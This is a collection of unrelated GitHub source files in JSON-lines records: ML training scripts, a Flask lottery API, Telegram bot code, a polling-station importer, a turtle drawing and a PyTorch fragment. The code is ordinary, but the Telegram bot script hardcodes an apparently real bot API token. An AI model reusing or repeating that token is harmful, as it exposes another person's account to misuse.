loss:\", test_loss)\n print(\"Test accuracy:\", test_accuracy)\n\n # Loss and accuracy plots\n # plot_metrics(history1, 'loss', 'Simple classifier')\n plot_metrics(history1, 'accuracy', 'Simple classifier')\n\n # Convolutional model \n model = image_cnn_classifier()\n model.compile(optimizer='adam',loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n history = model.fit(train_set, train_label, validation_data=[test_set, test_label], epochs=10)\n test_loss, test_accuracy = model.evaluate(test_set, test_label)\n print(\"Test loss:\", test_loss)\n print(\"Test accuracy:\", test_accuracy)\n\n # Loss and accuracy plots\n # plot_metrics(history, 'loss', 'CNN classifier')\n plot_metrics(history, 'accuracy', 'CNN classifier')\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"francescogrienti/DeepLearning","sub_path":"Lecture7/Exercise1.py","file_name":"Exercise1.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43966894465","text":"'''\nCreated on Mar 31, 2019\n\n@author: dulan\n'''\nimport csv\nimport random\n\nfrom main.preprocess import preprocess\nfrom params import DICTIONARY, FILES\nfrom data.data_loader import data_loader\n\n\nclass data_generator(object):\n def __init__(self, ratio):\n self.ratios = ratio\n self.output_basename = 'output.csv'\n self.data_loader_obj = data_loader()\n self.dictionary = self.data_loader_obj.load_dict(FILES.DICTIONARY_FILE_PATH)\n self.pre_process_o = preprocess()\n self.convert_to_singlish()\n\n def write_to_csv(self, write_this_list):\n with open(self.output_basename, 'w') as writeFile:\n writer = csv.writer(writeFile)\n writer.writerow(write_this_list)\n writeFile.close()\n\n def get_random_word(self, list_of_words):\n length_of_list = len(list_of_words)\n if length_of_list == 1:\n return list_of_words[0]\n else:\n return list_of_words[random.randint(0, length_of_list - 1)]\n\n def convert_to_singlish(self):\n content, tags = self.data_loader_obj.load_data_from_excel(FILES.EXCEL_DATA_FILE_PATH)\n for i, line in enumerate(content):\n print(line)\n words = self.pre_process_o.pre_process(line)\n for word in words:\n if word in self.dictionary.keys():\n if not self.dictionary[word][DICTIONARY.SINGLISH_WORD] == []:\n line = line.replace(word, self.get_random_word(self.dictionary[word][DICTIONARY.SINGLISH_WORD]))\n\n print(line, tags[i])\n self.write_to_csv([line, tags[i]])\n\n","repo_name":"sashinipi/Singlish-Recism-Detection","sub_path":"data/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42112879291","text":"import numpy\nimport h5py\nimport json\n\n\ndef convert(filename):\n\n with open(filename+\".txt\") as json_file:\n metadata = json.load(json_file)\n\n print(metadata)\n\n data = numpy.loadtxt(filename+\".dat\", skiprows=metadata[\"FILE_HEADER_LINES\"])\n\n print(data.shape)\n\n f = h5py.File(filename+'.h5', 'w')\n f1 = f.create_group(\"metadata\")\n f2 = f.create_group(\"data\")\n\n for key in metadata.keys():\n print(key, metadata[key])\n if metadata[key] is None:\n f1[key] = ''\n else:\n f1[key] = metadata[key]\n\n for i in range(data.shape[1]):\n f2[\"col%02d\"%i] = data[:,i]\n\n\n f.close()\n print(\"File written: \", filename+'.h5')\n\nif __name__ == \"__main__\":\n import os\n os.system(\"rm -f *.h5\")\n convert(\"dabam-001\")\n\n\n\n","repo_name":"srio/DabazNX","sub_path":"dabamnx/convert_dabam.py","file_name":"convert_dabam.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25849765921","text":"#coding:utf8\n\n# coding=utf-8\nimport json\nfrom flask import Blueprint, request\nfrom logger.server_logger import ServerLogger\nfrom services.lucky_draw_service import LuckyDrawService\n\n\nlucky_draw = Blueprint('lucky_draw',__name__)\n\n\n@lucky_draw.route('/api/luckydraw/prize/', methods=['Get'])\n@ServerLogger.log\ndef prize(unionid):\n prize_service = LuckyDrawService()\n response = prize_service.prize_drawing(unionid)\n return json.dumps(response)\n\n\n@lucky_draw.route('/api/luckydraw/quota/', 
methods=['Get'])\n@ServerLogger.log\ndef quota(unionid):\n ld_service = LuckyDrawService()\n quota = ld_service.get_number_of_remaining_draw_by_unionid(unionid)\n\n return json.dumps({'quota': quota})\n\n\n@lucky_draw.route('/api/luckydraw/prize', methods=['Get'])\n@ServerLogger.log\ndef get_lucky_draw_result():\n prize_service = LuckyDrawService()\n response = prize_service.get_lucky_draw_result()\n return json.dumps(response, ensure_ascii=False)\n\n\n@lucky_draw.route('/api/luckydraw/prize', methods=['Post'])\n@ServerLogger.log\ndef update_redeem_result():\n lucky_draw_data = json.loads(request.data.decode())\n lucky_draw_service = LuckyDrawService()\n result = lucky_draw_service.update_redeem_result(lucky_draw_data['id'])\n if result.acknowledged:\n return json.dumps({\"result\": result.acknowledged})\n else:\n return json.dumps({\"result\": result.acknowledged}), 401\n","repo_name":"chenhaoxian/snack_bar","sub_path":"server/restful/lucky_draw_router.py","file_name":"lucky_draw_router.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37962601948","text":"#File handling\n\n'''\nw --> write only\nr --> read only\nr+ --> read $ write\na --> append\n'''\n\n#Writing to a file\n\nmyList = [1,2,3]\n\nmyFile = open(\"testFile.txt\", \"w\")\n\nfor num in myList:\n myFile.write(str(num)+\"\\n\")\n\nmyFile.close()\n\n#Reading from a file\n\nmy_file = open(\"testFile.txt\", \"r\")\n\nprint(str(my_file.read()))\n\nmy_file.close()\n\nprint(\"line by line\")\n\nmy_file_line = open(\"testFile.txt\", \"r\")\nprint(str(my_file_line.readline()))\n\nmy_file_line.close()\n\n\n","repo_name":"audi4avik/Python","sub_path":"intro/file handling.py","file_name":"file handling.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29466172329","text":"from json import loads, dumps\nimport http.client as client\nfrom os import getenv\n\nBASE_DOMAIN = 'api.telegram.org'\nBASE_ENCODING = 'utf-8'\nCONTENT_TYPE_HEADER_NAME = 'Content-Type'\nCONTENT_TYPE_APPLICATION_JSON = 'application/json'\nBASE_HEADERS = {CONTENT_TYPE_HEADER_NAME: CONTENT_TYPE_APPLICATION_JSON}\n\nBOT_TOKEN = getenv(\"BOT_TOKEN\")\nBASE_URL = f\"/bot{BOT_TOKEN}\"\nSEND_MESSAGE_ENDPOINT = f\"{BASE_URL}/sendMessage\"\nSEND_POLL_ENDPOINT = f\"{BASE_URL}/sendPoll\"\n\n\ndef send_message(text: str, chat_id: int):\n body = {\n \"text\": text,\n \"chat_id\": chat_id\n }\n\n return make_rest_api_call(url=SEND_MESSAGE_ENDPOINT, method='POST', body=body)\n\n\ndef send_poll(chat_id: int, question: str, options: list, allow_multiple_answers=False, is_anonymous=False):\n body = {\n \"chat_id\" : chat_id,\n \"question\": question,\n \"options\": options,\n \"allows_multiple_answers\": allow_multiple_answers,\n \"is_anonymous\": is_anonymous\n }\n make_rest_api_call(url=SEND_POLL_ENDPOINT, method='POST', body=body)\n\n\ndef make_rest_api_call(url: str, method: str, body: dict):\n conn = client.HTTPSConnection(BASE_DOMAIN)\n json_body = dumps(body)\n bytes_body = bytes(json_body,encoding=BASE_ENCODING)\n\n conn.request(method, url, headers=BASE_HEADERS, body=bytes_body)\n response = conn.getresponse()\n raw_res = response.read()\n conn.close()\n json_res = loads(raw_res)\n\n return 
json_res","repo_name":"Sic4Parvis9Magna/adam-bot","sub_path":"adam/telegram_client.py","file_name":"telegram_client.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21680957252","text":"# pip install pytelegrambotapi\n\n\nimport telebot\nfrom telebot import types\n\nbot = telebot.TeleBot('5730541647:AAE5TzJfqUeXuPQ6XGm7L5f7cy_nuZYHdwQ');\n\n\n\n\n# @bot.message_handler(commands=['Start', 'Help'])\n# def send_welcome(message):\n# bot.reply_to(message, \"Привет, приветсвую тебя в самом продвинутом телеграм канале, здесь ты как в конструкторе\"\n# \" можешь собрать все интересующие тебя уведомленияю: новости, курсы валют, и даже обновления\"\n# \" твоих рузей в Instogtram.\")\n\n# @bot.message_handler(commands=['Start', 'Help']\n# def send_welcome(message):\n# markup = types.ReplyKeyboardMarkup(row_width=2)\n# itembtn1 = types.KeyboardButton('a')\n# itembtn2 = types.KeyboardButton('v')\n# itembtn3 = types.KeyboardButton('d')\n# markup.add(itembtn1, itembtn2, itembtn3)\n# bot.send_message(chat_id, \"Choose one letter:\", reply_markup=markup)\n\n@bot.message_handler(func=lambda m: True)\ndef echo_all(message):\n\n\n markup = types.ReplyKeyboardMarkup(row_width=2)\n itembtn1 = types.KeyboardButton('Подписаться на гороскоп')\n # itembtn2 = types.KeyboardButton('v')\n # itembtn3 = types.KeyboardButton('d')\n markup.row(itembtn1)\n bot.send_message(message.from_user.id, \"Choose one letter:\", reply_markup=markup)\n\n\n\n\n\n\n# def get_text_messages(message):\n# # @bot.message_handler(content_types=['text', 'document', 'audio']) '''mabi that too'''\n#\n# if message.text == \"Привет\":\n# bot.send_message(message.from_user.id, \"Привет чем могу помочь?\")\n# elif message.text ==\"/help\":\n# bot.send_message(message.from_user.id, \"Напиши привет\")\n# else:\n# bot.send_message(message.from_user.id, \"Я тебя не помню напиши '/help'\")\n\n\n\"\"\"Проверка новых сообщений\"\"\"\nbot.polling(none_stop=True, interval=0)\n\n","repo_name":"IvanZhdaniuk/bot_shop_sells","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6509828066","text":"from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter\n\n\nclass Command(BaseXpressDemocracyClubCsvImporter):\n council_id = \"WIL\"\n addresses_name = \"2021-07-26/WiltsDemocracy_Club__19August2021.tsv\"\n stations_name = \"2021-07-26/WiltsDemocracy_Club__19August2021.tsv\"\n elections = [\"2021-08-19\"]\n csv_delimiter = \"\\t\"\n\n # Checked 63862 (out of council area) and 64258/64219 proximity.\n\n # These were found because they weren't geocodeable, and so are presumably wrong\n station_postcode_fixes = {\n # Easterton Village Hall, Easterton, Devizes\n # https://wvha.org.uk/listing/easterton-village-hall/\n (\"63510\", \"SN10 4P\"): \"SN10 4PS\",\n # Edington Parish Hall, Edington, Westbury\n (\"64399\", \"\"): \"\",\n # Tidworth Community Centre, Wylye Road Tidworth\n # https://tidworthtowncouncil.gov.uk/tidworth-community-centre/\n (\"63590\", \"SP9 7QH\"): \"SP9 7QQ\",\n # Beanacre Church Schoolroom, Beanacre, Melksham\n (\"64478\", \"SN12\"): \"\",\n # Great Bedwyn Cricket Club, Frog Lane, Great Bedwyn, Marlborough\n # http://www.wccl.org.uk/team_info.php?id=1247\n (\"63542\", \"SN8 3PD\"): \"SN8 3PB\",\n # Wilton Community Centre, West Street, Wilton, Salisbury\n # 
https://wvha.org.uk/listing/wilton-community-centre/\n (\"63870\", \"SP2 0DJ\"): \"SP2 0DG\",\n # Easton Royal Village Hall, Easton Royal, Pewsey\n # https://wvha.org.uk/listing/easton-royal-village-hall/\n (\"63514\", \"\"): \"SN9 5LY\",\n # Baydon Young Peoples Hall, Baydon, Marlborough\n # http://www.baydon.org/BYPA.htm\n (\"63447\", \"\"): \"SN8 2JE\",\n }\n\n def station_record_to_dict(self, record):\n if (\n record.polling_place_id,\n record.polling_place_postcode,\n ) in self.station_postcode_fixes:\n record = record._replace(\n polling_place_postcode=self.station_postcode_fixes[\n (record.polling_place_id, record.polling_place_postcode)\n ]\n )\n\n return super().station_record_to_dict(record)\n\n #\n def address_record_to_dict(self, record):\n if record.addressline6.strip() in [\n \"SN8 4AF\",\n \"SN10 4AD\",\n \"SN10 3SQ\",\n \"SN8 1QB\",\n \"SP4 9QE\",\n \"SN10 3DD\",\n \"SN10 5HE\",\n \"SN10 2PA\",\n \"SN8 3DY\",\n \"SP5 2BZ\",\n \"SP5 2NL\",\n \"SP5 2DT\",\n \"SP4 8JD\",\n \"SP4 7PB\",\n \"SN11 0PQ\",\n \"SN5 0AB\",\n \"SN16 9ES\",\n \"BA13 4LY\",\n \"SN15 3SX\",\n \"SN11 8EJ\",\n \"SN15 5EY\",\n \"BA14 7DW\",\n \"SP4 7FF\",\n \"SN15 3RW\",\n \"SN5 4HB\",\n \"SN8 4NR\",\n \"SN14 6HT\",\n \"SN10 3EZ\",\n \"SP3 6DY\",\n \"SN10 4QP\",\n \"SN8 1HG\",\n ]:\n return None # split\n\n return super().address_record_to_dict(record)\n","repo_name":"DemocracyClub/UK-Polling-Stations","sub_path":"polling_stations/apps/data_importers/management/commands/import_wiltshire.py","file_name":"import_wiltshire.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"13300243564","text":"import csv\n\ndistance_table = {}\n\n\ndef load_distance_table_data(distance_file):\n \"\"\"Takes a CSV file and converts it into a nested dictionary\n\n The first for loop will add the distances in miles to each row. 
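(Illustrative example with made-up names: for rows 'HUB,0,' and 'ADDR1,3.5,0', where the first field is the address, the load gives distance_table['ADDR1']['HUB'] == 3.5, and the mirroring pass copies it into the empty distance_table['HUB']['ADDR1'].) 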
The second for loop ensures that each row has\n the same number of distances to and from each address\n\n Args:\n distance_file: This argument is a CSV file to be converted to a nested dictionary\n\n Returns:\n distance_table: This function returns a nested dictionary\n\n Raises:\n N/A: This function raises no errors/has no error checking\n\n Time complexity: Because of the nested for loop, it's time complexity is O(n^2)\n Space complexity: Because of the nested for loop the space complexity is O(n^2)\n \"\"\"\n with open(distance_file) as distances:\n rows = list(csv.reader(distances))\n cols = [row[0] for row in rows]\n for row in rows:\n distance_table[row[0]] = {}\n for i, v in enumerate(row[1:]):\n distance_table[row[0]][cols[i]] = float(v if v else 0)\n for a in cols:\n for b in cols:\n if distance_table[a][b]:\n distance_table[b][a] = distance_table[a][b]\n else:\n distance_table[a][b] = distance_table[b][a]\n return distance_table\n","repo_name":"alexhenson/Automated-Package-Delivery","sub_path":"libraries/load_distance_table_data.py","file_name":"load_distance_table_data.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38260839640","text":"import turtle\nimport random\n\nnumberOfConfetti = 200\n\ncolors = ['aliceblue', 'antiquewhite', 'aqua', 'aquamarine', 'azure', 'beige', 'bisque', 'black', 'blanchedalmond',\n 'blue', 'blueviolet', 'brown', 'burlywood', 'cadetblue', 'chartreuse', 'chocolate', 'coral', 'cornflowerblue',\n 'cornsilk', 'crimson', 'cyan', 'darkblue', 'darkcyan', 'darkgoldenrod', 'darkgray', 'darkgreen', 'darkkhaki',\n 'darkmagenta', 'darkolivegreen', 'darkorange', 'darkorchid', 'darkred', 'darksalmon', 'darkseagreen',\n 'darkslateblue', 'darkslategray', 'darkturquoise', 'darkviolet', 'deeppink', 'deepskyblue', 'dimgray',\n 'dodgerblue', 'firebrick', 'floralwhite', 'forestgreen', 'fuchsia', 'gainsboro', 'ghostwhite', 'gold',\n 'goldenrod', 'gray', 'green', 'greenyellow', 'honeydew', 'hotpink', 'indianred', 'indigo', 'ivory', 'khaki',\n 'lavender', 'lavenderblush', 'lawngreen', 'lemonchiffon', 'lightblue', 'lightcoral', 'lightcyan',\n 'lightgoldenrodyellow', 'lightgreen', 'lightgray', 'lightpink', 'lightsalmon', 'lightseagreen', 'lightskyblue',\n 'lightslategray', 'lightsteelblue', 'lightyellow', 'lime', 'limegreen', 'linen', 'magenta', 'maroon',\n 'mediumaquamarine', 'mediumblue', 'mediumorchid', 'mediumpurple', 'mediumseagreen', 'mediumslateblue',\n 'mediumspringgreen', 'mediumturquoise', 'mediumvioletred', 'midnightblue', 'mintcream', 'mistyrose', 'moccasin',\n 'navajowhite', 'navy', 'oldlace', 'olive', 'olivedrab', 'orange', 'orangered', 'orchid', 'palegoldenrod',\n 'palegreen', 'paleturquoise', 'palevioletred', 'papayawhip', 'peachpuff', 'peru', 'pink', 'plum', 'powderblue',\n 'purple', 'red', 'rosybrown', 'royalblue', 'saddlebrown', 'salmon', 'sandybrown', 'seagreen', 'seashell', 'sienna',\n 'silver', 'skyblue', 'slateblue', 'slategray', 'snow', 'springgreen', 'steelblue', 'tan', 'teal', 'thistle',\n 'tomato', 'turquoise', 'violet', 'white', 'whitesmoke', 'yellow', 'yellowgreen']\n\nnum = random.randrange(len(colors))\n\nmyPen = turtle.Turtle()\nmyPen.hideturtle()\nmyPen.speed(0)\nwindow = turtle.Screen()\nwindow.bgcolor(\"#ffffff\")\n\nmyPen.pensize(1)\nradius = 9 # Radius of a confetti, in pixels\nlist = []\n\ndef addText(x, y, text, color, size):\n myPen.penup()\n myPen.goto(x, y)\n myPen.pendown()\n myPen.color(color)\n myPen.write(text, None, 
align=\"center\", font=(\"Times\", size, \"normal\"))\n\n# Add Confetti\nfor confetti in range(0, numberOfConfetti):\n overlap = True\n while overlap:\n x = random.randint(-180 + radius, 180 - radius)\n y = random.randint(-180 + radius, 180 - radius)\n # Check if new confetti overlap with any existing confetti\n overlap = False\n for confetti in list:\n # Use Pythagoras Formula to calculate the distance between two confetti\n distance = ((confetti[0] - x) ** 2 + (confetti[1] - y) ** 2) ** 0.5\n # If two confetti are too close to each other, then they will overlap!\n if distance <= (2 * radius) + 2:\n overlap = True\n\n list.append([x, y])\n\n addText(0, 40, \"HAPPY\", 'black', \"45\")\n addText(0, 0, \"100 DAYS\", 'purple', \"45\")\n addText(0, -40, \"OF CODING!\", 'black', \"45\")\n\n # Generate a random colour!\n num = random.randrange(0, len(colors), 1)\n myPen.penup()\n myPen.goto(x, y - radius)\n myPen.pendown()\n myPen.fillcolor(colors[num])\n myPen.color(colors[num])\n myPen.begin_fill()\n myPen.circle(radius - 2)\n myPen.end_fill()\n print(str(len(list)) + \" confetti\")\n","repo_name":"cavmp/200DaysofCode","sub_path":"Day100-Confetti.py","file_name":"Day100-Confetti.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16468412581","text":"import sys\nimport pygame\nimport time\nimport numpy\n\nfrom pygame.locals import *\n\nfrom create_box import create_box\nfrom create_box import load_box\nfrom path_finder import find_path\n\npygame.init()\n\n########\n#CONSTS#\n########\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\n\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\n\nYELLOW = (255, 255, 0)\nCYAN = (0, 255, 255)\nPURPLE = (255, 0, 255)\n\n# matrix generation #\n#####################\n \nDIM_X = 1024\nDIM_Y = 728\n\nMATRIX = []\n\n#a = (579,407)\n#b = (595,480)\nouta = (566,398),(586,418)\nina = (586,418),(566,398)\noutb = (586,486),(611,468)\ninb = (611,468),(586,486)\nline1 = (1, (outa,2))\nline2 = (2, (ina,1),(inb,3))\nline3 = (3, (outb,2))\nDATA = ( line1, line2, line3 )\n\n#####################\n\nBACKGROUND_SOURCE = 'images/background.png'\nBACKGROUND_IMG = pygame.image.load(BACKGROUND_SOURCE)\nBACKGROUND_POSX = -100\nBACKGROUND_POSY = -120\nMAP_WID = 1024\nMAP_HEI = 768\nSTEP = 1\n\nWINDOW_RESOLUTION = (550, 450)\nWINDOW_CENTER = [int(WINDOW_RESOLUTION[0]/2), int(WINDOW_RESOLUTION[1]/2)]\nHERO_POSITION = [BACKGROUND_POSX + int(WINDOW_RESOLUTION[0]/2), BACKGROUND_POSY + int(WINDOW_RESOLUTION[1]/2)]\nWINDOW_NAME = \"OurGame\"\nFPS = 60\n\nHERO_SPEED = 25\nHERO_WALK = 1\nHERO_RUN = 2\n\nsetDisplay = pygame.display.set_mode(WINDOW_RESOLUTION)\npygame.display.set_caption(WINDOW_NAME)\n\n###########################################\n\nTABLE_SOURCE = 'images/edit_table1.png'\nTABLE_IMG = pygame.image.load(TABLE_SOURCE)\nTABLE_POSX = 270\nTABLE_POSY = 220\n\n###########################################\n\ndef detectDoubleClick():\n initTime = time.clock()\n while time.clock() - initTime < 0.15:\n for event in pygame.event.get([MOUSEBUTTONDOWN]):\n if event.type == MOUSEBUTTONDOWN:\n return True\n return False\n\ndef loadGame():\n global MATRIX\n notReady = True\n setDisplay.fill(BLACK)\n pygame.draw.rect(setDisplay, RED, (int(WINDOW_RESOLUTION[0]/8), int(WINDOW_RESOLUTION[1]/4)*3, int(WINDOW_RESOLUTION[0]/8)*6, int(WINDOW_RESOLUTION[1]/8)), 2)\n pygame.display.update()\n #pygame.time.wait(500)\n MATRIX = load_box( DIM_X , DIM_Y , \"map_input.txt\" )\n\n for i in range(1, 
7):\n        pygame.draw.rect(setDisplay, WHITE, (int(WINDOW_RESOLUTION[0]/8), int(WINDOW_RESOLUTION[1]/4)*3, int(WINDOW_RESOLUTION[0]/8)*i, int(WINDOW_RESOLUTION[1]/8)))\n        pygame.draw.rect(setDisplay, RED, (int(WINDOW_RESOLUTION[0]/8), int(WINDOW_RESOLUTION[1]/4)*3, int(WINDOW_RESOLUTION[0]/8)*6, int(WINDOW_RESOLUTION[1]/8)), 2)\n        pygame.display.update()\n        pygame.time.wait(100)\n\ndef screenBoundsCheck(minus = False, axisX = False, axisY = False):\n    global BACKGROUND_POSX, BACKGROUND_POSY\n    if minus:\n        if (BACKGROUND_POSX - STEP + MAP_WID >= WINDOW_RESOLUTION[0]) and axisX:\n            BACKGROUND_POSX -= STEP\n        if (BACKGROUND_POSY - STEP + MAP_HEI >= WINDOW_RESOLUTION[1]) and axisY:\n            BACKGROUND_POSY -= STEP\n    else:\n        if (BACKGROUND_POSX + STEP <= 0) and axisX:\n            BACKGROUND_POSX += STEP\n        if (BACKGROUND_POSY + STEP <= 0) and axisY:\n            BACKGROUND_POSY += STEP\n\ndef translate(x , y):\n    global BACKGROUND_POSX\n    global BACKGROUND_POSY\n    return (int(x - BACKGROUND_POSX),int(y - BACKGROUND_POSY))\n\n\nfrom engineClass import dynamicObject\nfrom engineClass import staticObject\nnpc2 = dynamicObject('Stworek2', (655,415)) # 655,415\n#GAME_OBJECTS = {npc1.getPosition():npc1}\nGAME_OBJECTS = [npc2]\n\nnpc1 = dynamicObject('Potworek2', (655,415))\nnpc2 = dynamicObject('Stworek2', (360, 400))\nnpc3 = dynamicObject('Horrorek3', (484, 541))\nhero = dynamicObject('Hero', (WINDOW_CENTER[0]-BACKGROUND_POSX, WINDOW_CENTER[1]-BACKGROUND_POSY))\nSTATIC_OBJECTS = [0]\nSTATIC_OBJECTS = STATIC_OBJECTS + [ staticObject('Stol', (TABLE_POSX, TABLE_POSY) , -1, TABLE_IMG) ]\n\nSTANDING_POINTS = [0]\nSTANDING_POINTS = STANDING_POINTS + [ (316,325) ]\n\n#GAME_OBJECTS = {npc1.getPosition():npc1}\nGAME_OBJECTS = [npc1, npc2, npc3]\nfor e in GAME_OBJECTS:\n    e.setTarget(390, 340)\n\ndef sigKill():\n    pygame.quit()\n    sys.exit()\n\nhere = 0\n\ndef drawGame():\n    global BACKGROUND_POSX\n    global BACKGROUND_POSY\n    global here  # 'here' is read below, so the global declaration must come before its first use\n\n    #hero moving\n    correction = -1\n    if (hero.move(MATRIX, DATA)):\n        correction = 0\n    heroPos = hero.getPosition()\n    heroX = int(heroPos[0] + BACKGROUND_POSX)\n    heroY = int(heroPos[1] + BACKGROUND_POSY)\n    BACKGROUND_POSX = - heroPos[0] + WINDOW_CENTER[0]\n    BACKGROUND_POSY = - heroPos[1] + WINDOW_CENTER[1]\n\n    #our weird background\n    setDisplay.blit(BACKGROUND_IMG,(BACKGROUND_POSX, BACKGROUND_POSY))\n\n\n\n    mousePosition = pygame.mouse.get_pos()\n    matrixPosition = MATRIX[ mousePosition[0] - BACKGROUND_POSX][mousePosition[1] - BACKGROUND_POSY ]\n    for i in range(1,len(STATIC_OBJECTS)):\n        if ( matrixPosition == -i ):\n            setDisplay.blit(STATIC_OBJECTS[i].getGraphic(), (BACKGROUND_POSX+STATIC_OBJECTS[i].getPosition()[0]+correction, BACKGROUND_POSY+STATIC_OBJECTS[i].getPosition()[1]+correction))\n        if ( heroPos == STANDING_POINTS[i] and here == 0):\n            print(\"ARRIVED!\")\n            here = 1\n            #HERE: display the popup window\n\n    pygame.draw.circle(setDisplay, RED, (heroX, heroY), 10)\n\n    #gameObjects\n    for npc in GAME_OBJECTS:\n        npc.move(MATRIX,DATA)\n        npcPos = npc.getPosition()\n        npcX = int(npcPos[0] + BACKGROUND_POSX + correction)\n        npcY = int(npcPos[1] + BACKGROUND_POSY + correction)\n        pygame.draw.circle(setDisplay, GREEN, (npcX, npcY), 5)\n\n\n    pygame.display.update()\n    FPS_TIME.tick(FPS)\n\ndef runGame():\n    global BACKGROUND_POSX\n    global BACKGROUND_POSY\n    global HERO_SPEED\n    while True:\n        #events\n        for event in pygame.event.get():\n            #print event\n            if event.type == QUIT:\n                pygame.quit()\n                sys.exit()\n            elif event.type == MOUSEBUTTONDOWN:\n                #checking for double click\n                if detectDoubleClick():\n                    #HERO_SPEED = HERO_RUN\n                    
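# a second click within the 0.15 s window counts as a double click and switches to run speed\n                    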
hero.setStep(HERO_RUN)\n else:\n #HERO_SPEED = HERO_WALK\n hero.setStep(HERO_WALK)\n\n\n mousePosition = pygame.mouse.get_pos() # (x, y)\n hero.setTarget(translate(mousePosition[0], mousePosition[1])[0],translate(mousePosition[0], mousePosition[1])[1])\n global here\n here = 0\n matrixPosition = MATRIX[ mousePosition[0] - BACKGROUND_POSX][mousePosition[1] - BACKGROUND_POSY ]\n for i in range(1,len(STATIC_OBJECTS)): # przeszukiwanie tablicy obiektow statycznych\n if ( matrixPosition == -i ):\n hero.setTarget(STANDING_POINTS[i][0],STANDING_POINTS[i][1])\n\n\n\n\n keys = pygame.key.get_pressed()\n if keys[K_UP] or keys[K_w]:\n #BACKGROUND_POSY += STEP\n screenBoundsCheck(False, False, True)\n HERO_POSITION[1] += STEP\n elif keys[K_DOWN] or keys[K_s]:\n #BACKGROUND_POSY -= STEP\n screenBoundsCheck(True, False, True)\n HERO_POSITION[1] -= STEP\n if keys[K_LEFT] or keys[K_a]:\n #BACKGROUND_POSX += STEP\n screenBoundsCheck(False, True, False)\n HERO_POSITION[0] += STEP\n elif keys[K_RIGHT] or keys[K_d]:\n #BACKGROUND_POSX -= STEP\n screenBoundsCheck(True, True, False)\n HERO_POSITION[0] -= STEP\n \n drawGame()\n \n#loadGame()\n\nwhile True:\n global FPS_TIME\n FPS_TIME = pygame.time.Clock()\n loadGame()\n runGame()\n ","repo_name":"maciex006/OurGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1503251112","text":"import sys\nsys.path.insert(1, '../')\nfrom nlm import NLM\nfrom math import log\n\npath = './test.txt.nospaces'\n\nif __name__ == \"__main__\":\n \n NLM.load(\"huge\")\n\n f = open(path,'r')\n\n h = NLM()\n\n for line in f.readlines():\n beam = [(0, h)]\n b = 20\n for c in list(line[:-1]) + [\"\"]:\n newbeam = []\n for score, state in beam:\n newscore = score + log(state.next_prob(c))\n newstate = state + c\n newbeam.append((newscore, newstate))\n\n newscore = score + log(state.next_prob(\"_\")) + log((state+\"_\").next_prob(c))\n newstate = state + '_' + c\n newbeam.append((newscore, newstate))\n\n beam = sorted(newbeam, reverse = True)[:b]\n\n score, state = beam[0]\n print(\" \".join(state.history).replace('', '').replace('', '').replace(' ', '').replace('_', ' '))\n","repo_name":"jshota/cs539-group_assignments","sub_path":"hw6/hw6-data/restore_spaces.py","file_name":"restore_spaces.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30936499573","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models\nfrom nets.vgg import *\nfrom net_utils import *\nfrom losses import *\n\nMODE_LIST = ['s2s', 'x2x', 'xs2s', 'xs2x']\n\nmean = torch.FloatTensor([0.485, 0.456, 0.406]).view([1,3,1,1])\nstd = torch.FloatTensor([0.229, 0.224, 0.225]).view([1,3,1,1])\n\n\nclass Lateral(nn.Module):\n\tdef __init__(self, in_channel, kernel_size, out_channel=None, shortcut_conv=False, prelu=True):\n\t\tsuper(Lateral, self).__init__()\n\t\tif out_channel is None:\n\t\t\tout_channel = in_channel\n\t\tself.in_channel = in_channel\n\t\tself.out_channel = out_channel\n\t\tself.kernel_size = kernel_size\n\t\tif prelu:\n\t\t\tself.net = nn.Sequential(\n\t\t\t\tnn.PReLU(),\n\t\t\t\tnn.Conv2d(in_channel, out_channel, kernel_size, stride=1, padding=kernel_size//2),\n\t\t\t\tnn.PReLU(),\n\t\t\t\tnn.Conv2d(out_channel, out_channel, kernel_size, stride=1, padding=kernel_size//2)\n\t\t\t\t)\t\t\n\t\telse:\n\t\t\tself.net = 
